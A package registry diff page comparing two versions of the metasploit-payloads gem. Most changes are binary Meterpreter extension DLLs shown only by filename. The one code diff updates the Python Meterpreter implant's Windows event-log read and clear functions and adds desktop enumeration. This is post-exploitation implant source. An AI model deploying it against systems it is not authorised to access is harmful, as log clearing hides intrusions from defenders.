RubyGems - metasploit-payloads - Versions diffs - 2.0.104 → 2.0.106 - Mend

metasploit-payloads 2.0.104 → 2.0.106

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (76) hide show

checksums.yaml CHANGED Viewed

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: e6ecc9cab0b79200d38b046332bbe62e4859e300a340a40ce4b67f179e206ecc
-  data.tar.gz: ead5bdae63b7a0420750de525ec873e377e2b9ef77f142b69e924c11a6ee834d
+  metadata.gz: 453b3c01afd395af3790b8a9393781f8a90c372945a8b9b4fa597bff94ec47ee
+  data.tar.gz: 16129f118a5a4cee8b66e4a37b824ecf8e0aed43be918ea9b5ef0b9a566d58bc
 SHA512:
-  metadata.gz: 35dd5a3f541b769b67e66c59b701fbeff29f5626d3a3072255d842cfe419867ad3cb579a0b10231a48e8f2aefdb8e904a78cb6bc3696da241d906d6f1f8b18ba
-  data.tar.gz: '080dfdd332d9f9fe280e472727a5f5cdb98bbdde4e80715f18fe1f69f04145bb874dfb686a126814224531f661ead4d0bb8d3ec63f08deb0fd2175ce4463d731'
+  metadata.gz: 263ccd130cdac66596843e65b9eac343be1bf554896eef1903a6180cf6955326b967a901b0fe7bef73a9e1f1435178d2d47e74aee1c7f4d247e565504726030b
+  data.tar.gz: 63b34db9fe29f7c6bd2d643b40b6a3fdc3963e994226235888de75da78e5d918caa911734b652dfea415a00f4211dede45180e02334fe8111644ba761e17bdc7

checksums.yaml.gz.sig CHANGED Viewed

Binary file

data/data/android/meterpreter.jar CHANGED Viewed

Binary file

data/data/android/metstage.jar CHANGED Viewed

Binary file

data/data/android/shell.jar CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/elevator.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_bofloader.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_espia.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_extapi.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_incognito.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_kiwi.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_lanattacks.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_peinjector.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_powershell.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_priv.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_python.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_sniffer.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_sniffer.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.py CHANGED Viewed

@@ -1,4 +1,5 @@
 import fnmatch
+import functools
 import getpass
 import os
 import platform
@@ -669,7 +670,11 @@ TLV_TYPE_TERMINAL_COLUMNS      = TLV_META_TYPE_UINT    | 2601
 ##
 TLV_TYPE_IDLE_TIME             = TLV_META_TYPE_UINT    | 3000
 TLV_TYPE_KEYS_DUMP             = TLV_META_TYPE_STRING  | 3001
-TLV_TYPE_DESKTOP               = TLV_META_TYPE_STRING  | 3002
+TLV_TYPE_DESKTOP               = TLV_META_TYPE_GROUP   | 3004
+TLV_TYPE_DESKTOP_SESSION       = TLV_META_TYPE_UINT    | 3005
+TLV_TYPE_DESKTOP_STATION       = TLV_META_TYPE_STRING  | 3006
+TLV_TYPE_DESKTOP_NAME          = TLV_META_TYPE_STRING  | 3007
 ##
 # Event Log
@@ -744,6 +749,9 @@ VER_PLATFORM_WIN32s               = 0x0000
 VER_PLATFORM_WIN32_WINDOWS        = 0x0001
 VER_PLATFORM_WIN32_NT             = 0x0002
+# Windows Access Controls
+MAXIMUM_ALLOWED                   = 0x02000000
 WIN_AF_INET  = 2
 WIN_AF_INET6 = 23
@@ -1440,7 +1448,10 @@ def stdapi_sys_power_exitwindows(request, response):
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_open(request, response):
     source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']
-    handle = ctypes.windll.advapi32.OpenEventLogW(None, source_name)
+    OpenEventLogA = ctypes.windll.advapi32.OpenEventLogA
+    OpenEventLogA.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
+    OpenEventLogA.restype = ctypes.c_void_p
+    handle = OpenEventLogA(None, bytes(source_name, 'UTF-8'))
     if not handle:
         return error_result_windows(), response
     response += tlv_pack(TLV_TYPE_EVENT_HANDLE, handle)
@@ -1451,13 +1462,15 @@ def stdapi_sys_eventlog_read(request, response):
     handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
     flags = packet_get_tlv(request, TLV_TYPE_EVENT_READFLAGS)['value']
     offset = packet_get_tlv(request, TLV_TYPE_EVENT_RECORDOFFSET)['value']
-    adv32 = ctypes.windll.advapi32
-    bytes_read = ctypes.c_ulong(0)
-    bytes_needed = ctypes.c_ulong(0)
-    if adv32.ReadEventLogW(handle, flags, offset, ctypes.byref(bytes_read), 0, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
+    bytes_read = ctypes.c_uint32(0)
+    bytes_needed = ctypes.c_uint32(0)
+    ReadEventLogA = ctypes.windll.advapi32.ReadEventLogA
+    ReadEventLogA.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_uint32), ctypes.POINTER(ctypes.c_uint32)]
+    ReadEventLogA.restype = ctypes.c_bool
+    if ReadEventLogA(handle, flags, offset, ctypes.byref(bytes_read), 0, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
         return error_result_windows(), response
-    buf = ctypes.create_unicode_buffer(bytes_needed.value)
-    if not adv32.ReadEventLogW(handle, flags, offset, buf, bytes_needed, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
+    buf = (ctypes.c_uint8 * bytes_needed.value)()
+    if not ReadEventLogA(handle, flags, offset, buf, bytes_needed, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
         return error_result_windows(), response
     record = ctstruct_unpack(EVENTLOGRECORD, buf)
     response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, record.RecordNumber)
@@ -1466,8 +1479,9 @@ def stdapi_sys_eventlog_read(request, response):
     response += tlv_pack(TLV_TYPE_EVENT_ID, record.EventID)
     response += tlv_pack(TLV_TYPE_EVENT_TYPE, record.EventType)
     response += tlv_pack(TLV_TYPE_EVENT_CATEGORY, record.EventCategory)
-    response += tlv_pack(TLV_TYPE_EVENT_DATA, buf.raw[record.DataOffset:record.DataOffset + record.DataLength])
-    event_strings = buf.raw[record.StringOffset:].split('\x00', record.NumStrings)
+    response += tlv_pack(TLV_TYPE_EVENT_DATA, ctarray_to_bytes(buf[record.DataOffset:record.DataOffset + record.DataLength]))
+    event_string_buf = (ctypes.c_uint8 * len(buf[record.StringOffset:]))(*buf[record.StringOffset:])
+    event_strings = ctarray_to_bytes(event_string_buf).split(NULL_BYTE, record.NumStrings)[:record.NumStrings]
     for event_string in event_strings:
         response += tlv_pack(TLV_TYPE_EVENT_STRING, event_string)
     return ERROR_SUCCESS, response
@@ -1475,14 +1489,20 @@ def stdapi_sys_eventlog_read(request, response):
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_clear(request, response):
     handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
-    if not ctypes.windll.advapi32.ClearEventLogW(handle, None):
+    ClearEventLogA = ctypes.windll.advapi32.ClearEventLogA
+    ClearEventLogA.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
+    ClearEventLogA.restype = ctypes.c_bool
+    if not ClearEventLogA(handle, None):
         return error_result_windows(), response
     return ERROR_SUCCESS, response
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_numrecords(request, response):
     handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
-    total = ctypes.c_ulong(0)
+    total = ctypes.c_uint32(0)
+    GetNumberOfEventLogRecords = ctypes.windll.advapi32.GetNumberOfEventLogRecords
+    GetNumberOfEventLogRecords.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
+    GetNumberOfEventLogRecords.restype = ctypes.c_bool
     if not ctypes.windll.advapi32.GetNumberOfEventLogRecords(handle, ctypes.byref(total)):
         return error_result_windows(), response
     response += tlv_pack(TLV_TYPE_EVENT_NUMRECORDS, total.value)
@@ -1491,16 +1511,22 @@ def stdapi_sys_eventlog_numrecords(request, response):
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_oldest(request, response):
     handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
-    oldest = ctypes.c_ulong(0)
-    if not ctypes.windll.advapi32.GetOldestEventLogRecordW(handle, ctypes.byref(oldest)):
+    GetOldestEventLogRecord = ctypes.windll.advapi32.GetOldestEventLogRecord
+    GetOldestEventLogRecord.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
+    GetOldestEventLogRecord.restype = ctypes.c_bool
+    oldest = ctypes.c_uint32(0)
+    if not GetOldestEventLogRecord(handle, ctypes.byref(oldest)):
         return error_result_windows(), response
-    response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest)
+    response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest.value)
     return ERROR_SUCCESS, response
 @register_function_if(has_windll)
 def stdapi_sys_eventlog_close(request, response):
     handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
-    if not ctypes.windll.advapi32.CloseEventLogW(handle):
+    CloseEventLog = ctypes.windll.advapi32.CloseEventLog
+    CloseEventLog.argtypes = [ctypes.c_void_p]
+    CloseEventLog.restype = ctypes.c_bool
+    if not CloseEventLog(handle):
         return error_result_windows(), response
     return ERROR_SUCCESS, response
@@ -2755,6 +2781,92 @@ def stdapi_ui_get_idle_time(request, response):
     response += tlv_pack(TLV_TYPE_IDLE_TIME, idle_time)
     return ERROR_SUCCESS, response
+@register_function_if(has_windll)
+def stdapi_ui_desktop_enum(request, response):
+    response_parts = []
+    if ctypes.sizeof(ctypes.c_long) == ctypes.sizeof(ctypes.c_void_p):
+        LPARAM = ctypes.c_long
+    elif ctypes.sizeof(ctypes.c_longlong) == ctypes.sizeof(ctypes.c_void_p):
+        LPARAM = ctypes.c_longlong
+    DESKTOPENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
+    EnumDesktopsA = ctypes.windll.user32.EnumDesktopsA
+    EnumDesktopsA.argtypes = [ctypes.c_void_p, DESKTOPENUMPROCA, LPARAM]
+    EnumDesktopsA.restype = ctypes.c_long
+    WINSTAENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
+    EnumWindowStationsA = ctypes.windll.user32.EnumWindowStationsA
+    EnumWindowStationsA.argtypes = [WINSTAENUMPROCA, LPARAM]
+    EnumWindowStationsA.restype = ctypes.c_long
+    OpenWindowStationA = ctypes.windll.user32.OpenWindowStationA
+    OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_long, ctypes.c_bool]
+    OpenWindowStationA.restype = ctypes.c_void_p
+    CloseWindowStation = ctypes.windll.user32.CloseWindowStation
+    CloseWindowStation.argtypes = [ctypes.c_void_p]
+    CloseWindowStation.restype = ctypes.c_long
+    GetCurrentProcessId = ctypes.windll.kernel32.GetCurrentProcessId
+    GetCurrentProcessId.restype = ctypes.c_ulong
+    GetProcAddress = ctypes.windll.kernel32.GetProcAddress
+    GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
+    GetProcAddress.restype = ctypes.c_void_p
+    def get_session_id(pid):
+        dwSessionId = ctypes.c_ulong(0)
+        ProcessIdToSessionId = ctypes.windll.kernel32.ProcessIdToSessionId
+        ProcessIdToSessionId.argtypes = [ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
+        ProcessIdToSessionId.restype = ctypes.c_bool
+        if not ProcessIdToSessionId(ctypes.c_ulong(pid), ctypes.byref(dwSessionId)):
+            dwSessionId = ctypes.c_ulong(-1)
+        return dwSessionId
+    def desktop_enumdesktops_callback(response_parts, session_id, station_name, lpszDesktop, lParam):
+        if not station_name or not lpszDesktop:
+            return True
+        entry  = bytes()
+        entry += tlv_pack(TLV_TYPE_DESKTOP_SESSION, session_id)
+        entry += tlv_pack(TLV_TYPE_DESKTOP_STATION, station_name)
+        entry += tlv_pack(TLV_TYPE_DESKTOP_NAME, lpszDesktop.decode())
+        response_parts.append(tlv_pack(TLV_TYPE_DESKTOP, entry))
+        return True
+    @WINSTAENUMPROCA
+    def desktop_enumstations_callback(lpszWindowStation, lParam):
+        hWindowStation = OpenWindowStationA(lpszWindowStation, False, MAXIMUM_ALLOWED)
+        if not hWindowStation:
+            return True
+        callback = functools.partial(desktop_enumdesktops_callback, response_parts)
+        session_id = get_session_id(GetCurrentProcessId()).value
+        station_name = lpszWindowStation.decode()
+        callback = functools.partial(desktop_enumdesktops_callback, response_parts, session_id, station_name)
+        callback = DESKTOPENUMPROCA(callback)
+        EnumDesktopsA(hWindowStation, callback, 0)
+        if hWindowStation:
+            CloseWindowStation(hWindowStation)
+        return True
+    success = EnumWindowStationsA(desktop_enumstations_callback, 0)
+    if not success:
+        return error_result_windows(), response
+    response += bytes().join(response_parts)
+    return ERROR_SUCCESS, response
 @register_function_if(has_termios and has_fcntl)
 def stdapi_sys_process_set_term_size(request, response):
     channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']

data/data/meterpreter/ext_server_stdapi.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_stdapi.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_unhook.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/ext_server_winpmem.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/metsrv.x86.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x64.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x64.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x86.debug.dll CHANGED Viewed

Binary file

data/data/meterpreter/screenshot.x86.dll CHANGED Viewed

Binary file

data/lib/metasploit-payloads/version.rb CHANGED Viewed

@@ -1,6 +1,6 @@
 # -*- coding:binary -*-
 module MetasploitPayloads
-  VERSION = '2.0.104'
+  VERSION = '2.0.106'
   def self.version
     VERSION

data.tar.gz.sig CHANGED Viewed

Binary file

metadata CHANGED Viewed

@@ -1,7 +1,7 @@
 --- !ruby/object:Gem::Specification
 name: metasploit-payloads
 version: !ruby/object:Gem::Version
-  version: 2.0.104
+  version: 2.0.106
 platform: ruby
 authors:
 - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
   EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
   9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2022-12-13 00:00:00.000000000 Z
+date: 2023-01-12 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake

metadata.gz.sig CHANGED Viewed

Binary file